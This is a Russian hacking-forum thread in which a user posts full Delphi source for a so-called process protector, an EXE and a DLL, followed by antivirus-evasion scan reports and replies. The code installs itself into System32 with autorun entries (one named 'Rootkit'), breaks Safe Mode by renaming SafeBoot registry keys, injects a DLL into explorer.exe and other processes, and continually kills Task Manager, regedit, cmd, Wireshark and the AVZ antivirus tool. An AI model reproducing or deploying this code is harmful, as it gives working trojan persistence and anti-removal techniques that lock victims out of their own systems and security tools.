[Delphi] Протектор процесса

[IBM]

Всем привет, еще летом кодил.

main.exe:

Код:

program Project2;
{ Автор Nu11ers3t }
uses
  Registry, Windows, ShellApi, TLHelp32, SysUtils;


            {Настройки}
const
  {FAQ
    false - нет
    true - да
    }
  Reserve='dfhgjg.exe';
  PathToProtectFile='C:\Windows\System32\clsptr.exe'; // При использовании заполнить ' ' с путем до защищаемого файла
  KillTaskmgr=false; // Не давать запустить диспетчер задач ( Работает только при включенном UseExeProtection )
  KillRegEdit=true;  // Не давать запустить реестр ( Работает только при включенном UseExeProtection )
  KillWireshark=true; // Не давать запустить WireShark ( Работает только при включенном UseExeProtection )
  KillCmd=true; // Не давать запустить Командную строку ( Работает только при включенном UseExeProtection )
  Killavz=true; // Не давать запустить AVZ ( Работает только при включенном UseExeProtection )
  KillWscript=true; // Не давать запустить wscript ( Встроенный интерпретатор js и vbs скриптов, Работает только при включенном UseExeProtection )
  KillMsconfig=true; // Не давать запустить msconfig ( Работает только при включенном UseExeProtection )
  Autorun=true; // Автозапуск
  RegName='Protection'; //Имя ключа в реестре
  OldNameDLL='stctrl.dll'; //Исходное имя DLL    ( Желательно, что бы совпадало DLLInstallName
  Install=true; // Установка и запуск из Системной директории
  InstallName='stctrl.exe'; //Имя с которым происходит установка в систему
  DLLInstallName='stctrl.dll'; //Имя с которым происходит установка DLL в систему  ( Желательно, что бы совпадало с OldNameDLL )
  UseDLLProtection=true; // Использовать защиту с помощью DLL, потребуется кидать на машину с защищаемым файлом EXE файл и DLL файл
  UseEXEProtection=true; // Использовать защиту с помощью EXE файла. ( DLL не требуется )
  TryInjectDLLtoExplorer=true;     // Пытаться загрузить DLL в Explorer.exe
  TryInjectDLLtoALLProcess{Dangerous}=false;   // Пытаться загрузить DLL во все процессы ( Опасно, очень, не рекомендуется, на XP синий экран может быть, при завершении защищаемого файла будет создаваться очень много копий процессов )
  InjectDLLto='uTorrent.exe'; // При использовании опции поставить true на UseDLLProtection и заполнить ' ' нужным именем процесса.
  SignatureOfInstall='InstalledFromSysDir'; // Сигнатура установки в системной директории

  {Дальше не трогать!!}
  {-----------------------------------------------------------------------------------}
  Settings='ProtectionSettings.cfg';

function LoadLibrary_Ex(ProcessID:DWORD;LibName:PChar):boolean;
var
  pLL,pDLLPath:Pointer;
  hProcess,hThr:THandle;
  LibPathLen,_WR,ThrID:DWORD;
begin
  Result:=False;
  LibPathLen:=Length(string(LibName));
  hProcess:=OpenProcess(PROCESS_ALL_ACCESS,false,ProcessID);
  if hProcess=0 then exit;
  pDLLPath:=VirtualAllocEx(hProcess,0,LibPathLen+1,MEM_COMMIT,PAGE_READWRITE);
  if DWORD(pDLLPath)=0 then exit;
  pLL:=GetProcAddress(GetModuleHandle(kernel32),'LoadLibraryA');
  WriteProcessMemory(hProcess,pDLLPath,LibName,LibPathLen+1,_WR);
  hThr:=CreateRemoteThread(hProcess,0,0,pLL,pDLLPath,0,ThrID);
  if hThr=0 then exit;
  Result:=CloseHandle(hProcess);
end;
Function GetPID(ProcName:string) : integer;
 var
  hSnap:THandle;
  pe:TProcessEntry32;
  pid: DWORD;
begin
 pe.dwSize:=SizeOf(pe);
 hSnap:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
  If Process32First(hSnap,pe) then
    While Process32Next(hSnap,pe) do
      if ExtractFileName(pe.szExeFile)=ProcName then
        result:=pe.th32ProcessID;
end;
function GetOSVersion: Cardinal;
var
  OSVersionInfo: TOSVersionInfo;
begin
  Result := 0;
  FillChar(OSVersionInfo, Sizeof(OSVersionInfo), 0);
  OSVersionInfo.dwOSVersionInfoSize := SizeOf(OSVersionInfo);
  if GetVersionEx(OSVersionInfo) then
  begin
    if OSVersionInfo.dwPlatformId = VER_PLATFORM_WIN32_NT then
    begin
      if OSVersionInfo.dwMajorVersion = 5 then
      begin
        if OSVersionInfo.dwMinorVersion = 0 then
          Result := 50
        else if OSVersionInfo.dwMinorVersion = 2 then
          Result := 52
        else if OSVersionInfo.dwMinorVersion = 1 then
          Result := 51
      end;
      if OSVersionInfo.dwMajorVersion = 6 then
      begin
        if OSVersionInfo.dwMinorVersion = 0 then
          Result := 60
        else if OSVersionInfo.dwMinorVersion = 1 then
          Result := 61;
      end;
    end;
  end;
end;

function EnablePrivilege(Privilege: string): Boolean;
var
  TokenHandle: THandle;
  TokenPrivileges: TTokenPrivileges;
  ReturnLength: Cardinal;
begin
  Result := False;
  if Windows.OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, TokenHandle) then
  begin
    try
      LookupPrivilegeValue(nil, PAnsiChar(Privilege), TokenPrivileges.Privileges[0].Luid);
      TokenPrivileges.PrivilegeCount := 1;
      TokenPrivileges.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
      if AdjustTokenPrivileges(TokenHandle, False, TokenPrivileges, 0, nil, ReturnLength) then
        Result := True;
    finally
      CloseHandle(TokenHandle);
    end;
  end;
end;

function IsModuleLoaded(ModulePath: PAnsiChar; ProcessID: DWORD): Boolean;
var
  hSnapshot: THandle;
  ModuleEntry32: TModuleEntry32;
begin
  Result := False;
  hSnapshot := CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, ProcessID);
  if (hSnapshot <> -1) then
  begin
    ModuleEntry32.dwSize := SizeOf(TModuleEntry32);
    if (Module32First(hSnapshot, ModuleEntry32)) then
      repeat
        if string(ModuleEntry32.szExePath) = string(ModulePath) then
        begin
          Result := True;
          Break;
        end;
      until
        not Module32Next(hSnapshot, ModuleEntry32);
    CloseHandle(hSnapshot);
  end;
end;
Function ProcCheck(FileProcessName:Pansichar) : Boolean;
 var
 Snap: dword;
 Process: TPROCESSENTRY32;
begin
  Snap := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  if snap<>INVALID_HANDLE_VALUE then
    begin
    Process.dwSize:=SizeOf(TPROCESSENTRY32);
    repeat
          if lstrcmp(Process.szExeFile,FileProcessName)=0 then
              begin
              ProcCheck:=True;
              end;
    until not Process32Next(Snap, Process);
    end;
end;

function KillTask(ExeFileName: string): integer;
const
  PROCESS_TERMINATE=$0001;
var
  ContinueLoop: BOOL;
  FSnapshotHandle: THandle;
  FProcessEntry32: TProcessEntry32;
begin
  result := 0;

  FSnapshotHandle := CreateToolhelp32Snapshot
                     (TH32CS_SNAPPROCESS, 0);
  FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
  ContinueLoop := Process32First(FSnapshotHandle,
                                 FProcessEntry32);

  while integer(ContinueLoop) <> 0 do
  begin
    if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) =
         UpperCase(ExeFileName))
     or (UpperCase(FProcessEntry32.szExeFile) =
         UpperCase(ExeFileName))) then
      Result := Integer(TerminateProcess(OpenProcess(
                        PROCESS_TERMINATE, BOOL(0),
                        FProcessEntry32.th32ProcessID), 0));
    ContinueLoop := Process32Next(FSnapshotHandle,
                                  FProcessEntry32);
  end;

  CloseHandle(FSnapshotHandle);
end;
function InjectModule(ModulePath: PAnsiChar; ProcessID: DWORD): Boolean;
type
  TNtCreateThreadEx = function(
  ThreadHandle: PHANDLE;
  DesiredAccess: ACCESS_MASK;
  ObjectAttributes: Pointer;
  ProcessHandle: THANDLE;
  lpStartAddress: Pointer;
  lpParameter: Pointer;
  CreateSuspended: BOOL;
  dwStackSize: DWORD;
  Unknown1: Pointer;
  Unknown2: Pointer;
  Unknown3: Pointer): HRESULT; stdcall;
var
  lpStartAddress, lpParameter: Pointer;
  dwSize: Integer;
  hProcess, hThread, lpThreadId, lpExitCode, lpBytesWritten: Cardinal;
  NtCreateThreadEx: TNtCreateThreadEx;
begin
  Result := False;
  if IsModuleLoaded(ModulePath, ProcessID) = True then
    Exit;
  hProcess := 0;
  hProcess := OpenProcess(MAXIMUM_ALLOWED, False, ProcessID);
  if hProcess = 0 then
    Exit;
  dwSize := StrLen(ModulePath) + 1;
  lpParameter := VirtualAllocEx(hProcess, nil, dwSize, MEM_COMMIT, PAGE_READWRITE);
  if (lpParameter = nil) then
  begin
    if hProcess <> 0 then
      CloseHandle(hProcess);
    Exit;
  end;
  if GetOSVersion >= 60 then
    NtCreateThreadEx := GetProcAddress(GetModuleHandleW('ntdll'), 'NtCreateThreadEx');
  lpStartAddress := GetProcAddress(GetModuleHandleW('kernel32'), 'LoadLibraryA');
  if (lpStartAddress = nil) then
    Exit;
  if GetOSVersion >= 60 then
    if (@NtCreateThreadEx = nil) then
      Exit;
  lpBytesWritten := 0;
  if (WriteProcessMemory(hProcess, lpParameter, ModulePath, dwSize, lpBytesWritten) = False) then
  begin
    VirtualFreeEx(hProcess, lpParameter, 0, MEM_RELEASE);
    if hProcess <> 0 then
      CloseHandle(hProcess);
    Exit;
  end;
  hThread := 0;
  lpThreadId := 0;
  if GetOSVersion >= 60 then
    NtCreateThreadEx(@hThread, MAXIMUM_ALLOWED, nil, hProcess, lpStartAddress, lpParameter, false, 0, 0, 0, 0)
  else
    hThread := CreateRemoteThread(hProcess, nil, 0, lpStartAddress, lpParameter, 0, lpThreadId);
  if (hThread = 0) then
  begin
    VirtualFreeEx(hProcess, lpParameter, 0, MEM_RELEASE);
    CloseHandle(hProcess);
    Exit;
  end;
  GetExitCodeThread(hThread, lpExitCode);
  if hProcess <> 0 then
    CloseHandle(hProcess);
  if hThread <> 0 then
    CloseHandle(hThread);
  Result := True;
end;

Procedure MakeInstallation;
    var
      ProtectionEXE, TempPath, Sys:Array[0..260] of char;
      t:textfile;
      temp:string;
  begin
    GetModuleFileName(0, ProtectionEXE, sizeof(ProtectionEXE));
    GetSystemDirectory(sys, sizeof(sys));
    GetTempPath(sizeof(TempPath), TempPath);
    CopyFile(PathToProtectFile, PChar(TempPath+Reserve), true);
    temp:='\'+SignatureOfInstall;
    temp:=sys+temp;
    AssignFile(t, temp);
    Rewrite(t);
    Writeln(t, SignatureOfInstall);
    CloseFile(t);
    temp:='\'+InstallName;
    temp:=sys+temp;
    CopyFile(ProtectionEXE, Pchar(temp), true);
    ShellExecute(0, 'open', InstallName, nil, sys, SW_SHOW);
    if NOT autorun then Killtask(ExtractFileName(ProtectionEXE));;
  end;
Procedure Registrate(Fl:boolean);
  var
    reg:tregistry;
    Protect, Sys:Array[0..260] of char;
    temp:string;
  begin
    Reg:=Tregistry.Create;
    Reg.RootKey:=HKEY_CURRENT_USER;
    GetModuleFileName(0, Protect, sizeof(Protect));
    Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run', true);
    if Fl then
      begin
        MakeInstallation;
        GetSystemDirectory(sys, sizeof(sys));
        temp:='\'+InstallName;
        temp:=sys+temp;
        Reg.WriteString(RegName, temp);
        reg.CloseKey;
        reg:=Tregistry.Create;
        reg.RootKey:=HKEY_LOCAL_MACHINE;
        reg.MoveKey('System\CurrentControlSet\Control\SafeBoot\minimal','System\CurrentControlSet\Control\SafeBoot\M',true);
        reg.MoveKey('System\CurrentControlSet\Control\SafeBoot\NetWork','System\CurrentControlSet\Control\SafeBoot\N',true);
        reg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run',True);
        reg.WriteString('Rootkit', temp);
        reg.Closekey;
        Killtask(ExtractFileName(Protect))
      end
        else
          begin
            Reg.WriteString(RegName, Protect);
          end;
    Reg.CloseKey;
  end;
Procedure CopyDLL;
  var
    sys:Array[0..260] of char;
    temp:string;
  begin
    GetSystemDirectory(sys, sizeof(sys));
    temp:='\'+DLLInstallName;
    temp:=sys+temp;
    CopyFile(Pchar(OldNameDLL), Pchar(temp), true);
  end;
Procedure InizializateDLLProtection;
  var
    Protect, sys:Array[0..260] of char;
    i:integer;
    temp:string;
    t:textfile;
  begin
    GetSystemDirectory(sys, sizeof(sys));
    temp:='\'+Settings;
    temp:=sys+temp;
    AssignFile(t, temp);
    Rewrite(t);
    Writeln(t, PathToProtectFile);
    CloseFile(t);
    If TryInjectDLLtoALLProcess then
      begin
        for i:=1 to 9999 do
          begin
            If (FileExists(OldNameDLL)) and (GetPID(ExtractFileName(PathToProtectFile))<>i) and (GetPID(ExtractFileName(Protect))<>i) then InjectModule(OldNameDLL, i);
            If (FileExists(DLLInstallName)) and (GetPID(ExtractFileName(PathToProtectFile))<>i) and (GetPID(ExtractFileName(Protect))<>i) then InjectModule(DLLInstallName, i);
          end;
      end;
    If TryInjectDLLtoExplorer then
      begin
        If FileExists(OldNameDLL) then InjectModule(OldNameDLL, GetPID('explorer.exe'));
        If FileExists(DLLInstallName) then InjectModule(DLLInstallName, GetPID('explorer.exe'));
      end;
    If InjectDLLto<>' ' then
      begin
        If ProcCheck(InjectDLLto) then
        begin
          If FileExists(OldNameDLL) then InjectModule(OldNameDLL, GetPID(InjectDLLto));
          If FileExists(DLLInstallName) then InjectModule(DLLInstallName, GetPID(InjectDLLto));
        end;
      end;
  end;
Procedure StartProtectByEXE;
  var
   i:integer;
   temp:array[0..260] of char;
  begin
    GetTempPath(sizeof(Temp), Temp);
    If PathToProtectFile<>' ' then
      begin
        repeat
          If NOT ProcCheck(PChar(ExtractFileName(PathToProtectFile))) then
            begin
              if (FileExists(PathToProtectFile)) then ShellExecute(0, 'open', PathToProtectFile, nil, nil, SW_SHOW) else CopyFile(Pchar(Temp+reserve), PathToProtectFile, true);
            end;
          If KillTaskmgr then
            If ProcCheck('taskmgr.exe') then Killtask('taskmgr.exe');
          If KillRegEdit then
            If ProcCheck('regedit.exe') then Killtask('regedit.exe');
          If KillWireshark then
            if ProcCheck('Wireshark.exe') then Killtask('Wireshark.exe');
          If Killcmd then
            If ProcCheck('cmd.exe') then Killtask('cmd.exe');
          If KillWscript then
            If ProcCheck('wscript.exe') then Killtask('wscript.exe');
          If KillAVZ then
            If ProcCHeck('avz.exe') then Killtask('avz.exe');
        until i=1000;
      end;
  end;
Procedure CheckOptions;
  begin
    if not FileExists(SignatureOfInstall) then
      begin
        If UseDLLProtection then CopyDLL;
        if (Autorun) and (Install) then Registrate(true);
        if (Autorun) and (NOT Install) then Registrate(false);
        if (Not Autorun) and (Install) then MakeInstallation;
      end;
    if UseDLLProtection then InizializateDLLProtection;
    if UseExeProtection then StartProtectbyEXE;
  end;

begin
  CheckOptions;
end.

stctrl.dll

Код:

library stctrl;

uses
  Windows,
  TlHelp32,
  ShellApi,
  SysUtils,
  Classes;

{$R *.res}
const
  Settings='ProtectionSettings.cfg';
var
  i:integer;
  t:textfile;
  PathToProtectFile:string;
  sys:Array[0..260] of char;
  temp:string;

Function ProcCheck(FileProcessName:Pansichar) : Boolean;
 var
 Snap: dword;
 Process: TPROCESSENTRY32;
begin
  Snap := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  if snap<>INVALID_HANDLE_VALUE then
    begin
    Process.dwSize:=SizeOf(TPROCESSENTRY32);
    repeat
          if lstrcmp(Process.szExeFile,FileProcessName)=0 then
              begin
              ProcCheck:=True;
              end;
    until not Process32Next(Snap, Process);
    end;
end;

function KillTask(ExeFileName: string): integer;
const
  PROCESS_TERMINATE=$0001;
var
  ContinueLoop: BOOL;
  FSnapshotHandle: THandle;
  FProcessEntry32: TProcessEntry32;
begin
  result := 0;

  FSnapshotHandle := CreateToolhelp32Snapshot
                     (TH32CS_SNAPPROCESS, 0);
  FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
  ContinueLoop := Process32First(FSnapshotHandle,
                                 FProcessEntry32);

  while integer(ContinueLoop) <> 0 do
  begin
    if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) =
         UpperCase(ExeFileName))
     or (UpperCase(FProcessEntry32.szExeFile) =
         UpperCase(ExeFileName))) then
      Result := Integer(TerminateProcess(OpenProcess(
                        PROCESS_TERMINATE, BOOL(0),
                        FProcessEntry32.th32ProcessID), 0));
    ContinueLoop := Process32Next(FSnapshotHandle,
                                  FProcessEntry32);
  end;

  CloseHandle(FSnapshotHandle);
end;

begin
GetSystemDirectory(sys, sizeof(sys));
temp:='\'+Settings;
temp:=sys+temp;
AssignFile(t, temp);
Reset(t);
readln(t, PathToProtectFile);
If pathToProtectFile<>' ' then
  begin
    repeat
      If Not ProcCheck(Pchar(ExtractFileName(PathToProtectFile))) then ShellExecute(0, 'open', Pchar(PathToProtectFile), nil, nil, SW_SHOW);
    until i=1000;
  end;
end.

Для настроек файла смотрите константы.

main.exe

Название файла: root.exe
Размер файла: 98816 байт
Дата сканирования: Mon, 27 Jan 14 13:51:03 -0500
MD5-хэш файла: ea827f23fa74916336af42dbe8bf216f

Результат: 15 из 36

Ad-Aware: BehavesLike.Win32.Malware.ssc (mx-v)
AhnLab V3 Internet Security: OK
ArcaVir: OK
Avast: OK
AVG: LuaHeur.Win32/DH{A2cPZRM}
Avira: TR/Hijacker.Gen Trojan!
Bitdefender/BullGuard: Gen:Variant.Symmi.17046
BullGuard Internet Security 2013: Gen:Variant.Symmi.17046
Comodo: Malware@#2lz3zj86zalsq
Dr.Web: BACKDOOR.Trojan
Emsisoft Anti-Malware (a-squared Anti-Malware): OK
eScan Internet Security Suite 14: Gen:Variant.Symmi.17046 (DB)
Fortinet 5: OK
F-Prot: OK
F-Secure 2014: Gen:Variant.Symmi.17046
G Data: Virus: Gen:Variant.Symmi.17046 (Engine A)

IKARUS: Trojan-Dropper.Delf
Immunet/ClamAV: Gen:Variant.Symmi.17046
K7 Ultimate: OK
Kaspersky Internet Security 2014: OK
McAfee Total Protection 2013: OK
Microsoft Security Essentials: OK
NANO: OK
NOD32: NewHeur_PE
Norman: win32:win32/SB/Malware
Norton Internet Security: OK
Outpost Security Suite Pro 8.0: OK
Quick Heal: OK
Sophos: OK
SUPERAntiSpyware: OK
Total Defense Internet Security: OK
Trendmicro Titanium Internet Security: OK
Twister Antivirus 8: OK
VBA: OK
VIPRE Internet Security 2013: BehavesLike.Win32.Malware.ssc (mx-v)
Virit: OK

Scan report generated by Scanner.FuckAV.ru


stctrl.dll

Название файла: stctrl.dll
Размер файла: 90624 байт
Дата сканирования: Mon, 27 Jan 14 13:52:48 -0500
MD5-хэш файла: 384ab3a3f87eebd7708c28a0e409f29e

Результат: 1 из 36

Ad-Aware: OK
AhnLab V3 Internet Security: OK
ArcaVir: OK
Avast: OK
AVG: OK
Avira: OK
Bitdefender/BullGuard: OK
BullGuard Internet Security 2013: OK
Comodo: OK
Dr.Web: Trojan.Winlock.origin
Emsisoft Anti-Malware (a-squared Anti-Malware): OK
eScan Internet Security Suite 14: OK
Fortinet 5: OK
F-Prot: OK
F-Secure 2014: OK
G Data: OK
IKARUS: OK
Immunet/ClamAV: OK
K7 Ultimate: OK
Kaspersky Internet Security 2014: OK
McAfee Total Protection 2013: OK
Microsoft Security Essentials: OK
NANO: OK
NOD32: OK
Norman: OK
Norton Internet Security: OK
Outpost Security Suite Pro 8.0: OK
Quick Heal: OK
Sophos: OK
SUPERAntiSpyware: OK
Total Defense Internet Security: OK
Trendmicro Titanium Internet Security: OK
Twister Antivirus 8: OK
VBA: OK
VIPRE Internet Security 2013: OK
Virit: OK

Scan report generated by Scanner.FuckAV.ru

[Mr.Burns]

Несмотря на то, что [Ссылки могут видеть только зарегистрированные пользователи.] - [Ссылки могут видеть только зарегистрированные пользователи.][Ссылки могут видеть только зарегистрированные пользователи.]ога, джва года он пейсал, блять), только один вопрос - что и от кого ты собрался этим жиденьким поносом протектить?


Инжект длл, чтоб в ней убивать таскманагер. Это вам не это, не писькой в носок. Это протектор.

[IBM]

Цитата:

Несмотря на то, что [Ссылки могут видеть только зарегистрированные пользователи.] - [Ссылки могут видеть только зарегистрированные пользователи.][Ссылки могут видеть только зарегистрированные пользователи.]ога, джва года он пейсал, блять), только один вопрос - что и от кого ты собрался этим жиденьким поносом протектить?


Инжект длл, чтоб в ней убивать таскманагер. Это вам не это, не писькой в носок. Это протектор.

ЫЫЫ, считать мы не умеем. Если кто-то взял функцию инжекта DLL, которая используется в половине инжекторов, то это на 98%, мать его 98 процентов копипаст!
DLL вообще к диспетчеру задач не имеет никакого отношения, тоже мне - умник нашелся, бугагага.

Где я написал, что писал "джва года". Я написал, что писал летом.

Ты видимо еще тот дегенерат О-о

[sllrdp]

Вот моя версия, она проще конечно, но 2-3 гуарда нормально защищают друг друга по циклу =)... Делал для одного друга.

Код:

unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, Tlhelp32, Shellapi, StdCtrls, ExtCtrls;

type
  TForm1 = class(TForm)
    Timer3: TTimer;
    procedure Timer3Timer(Sender: TObject);


  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

function FindTask(ExeFileName: string): integer;
var
ContinueLoop: BOOL;
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
begin
result := 0;
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);
while integer(ContinueLoop) <> 0 do
begin
if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) = UpperCase(ExeFileName))
or (UpperCase(FProcessEntry32.szExeFile) = UpperCase(ExeFileName)))
then Result := 1;
ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;


type
PSP_CLASSINSTALL_HEADER = ^SP_CLASSINSTALL_HEADER;
SP_CLASSINSTALL_HEADER = record
cbSize: DWORD;
InstallFunction: Cardinal;
end;

PSP_PROPCHANGE_PARAMS = ^SP_PROPCHANGE_PARAMS;
SP_PROPCHANGE_PARAMS = record
ClassInstallHeader: SP_CLASSINSTALL_HEADER;
StateChange: DWORD;
Scope: DWORD;
HwProfile: DWORD;
end;

PSP_DEVINFO_DATA = ^SP_DEVINFO_DATA;
SP_DEVINFO_DATA = record
cbSize: DWORD;
ClassGuid: TGUID;
DevInst: DWORD;
Reserved: Longint;
end;

procedure TForm1.Timer3Timer(Sender: TObject);
begin
if FindTask('taskmgr.exe')=1 then
begin exit
end else begin
ShellExecute(0,'open','taskmgr.exe',nil,nil,SW_HIDE);
end;
end;
end.

[upO]

Такая фишка не проконает в procexp

[sealedbanana]

Запустился а работать просто не хочет. Хотя на виртуалке вроде все ок.